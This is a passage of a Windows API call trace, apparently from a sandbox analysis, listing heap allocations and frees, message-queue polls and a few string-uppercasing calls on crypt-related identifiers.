lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0236.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0236.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0236.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0236.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd188) returned 0x2e80330 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd188) returned 0x2e8d4c0 [0236.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0236.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0236.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0236.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0236.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0236.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0236.045] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0236.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0236.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0236.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0236.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0236.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0236.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0236.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0236.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0236.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0236.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0236.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0236.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0236.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0236.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0236.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0236.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0236.047] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0236.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0236.048] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0236.048] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0236.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0236.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0236.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd188) returned 0x2e80330 [0236.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0236.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd188) returned 0x2e9a650 [0236.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0236.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0236.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd188) returned 0x2e80330 [0236.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9a650 | out: hHeap=0x970000) returned 1 [0236.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd188) returned 0x2e9a650 [0236.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0236.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3bcb0 | out: 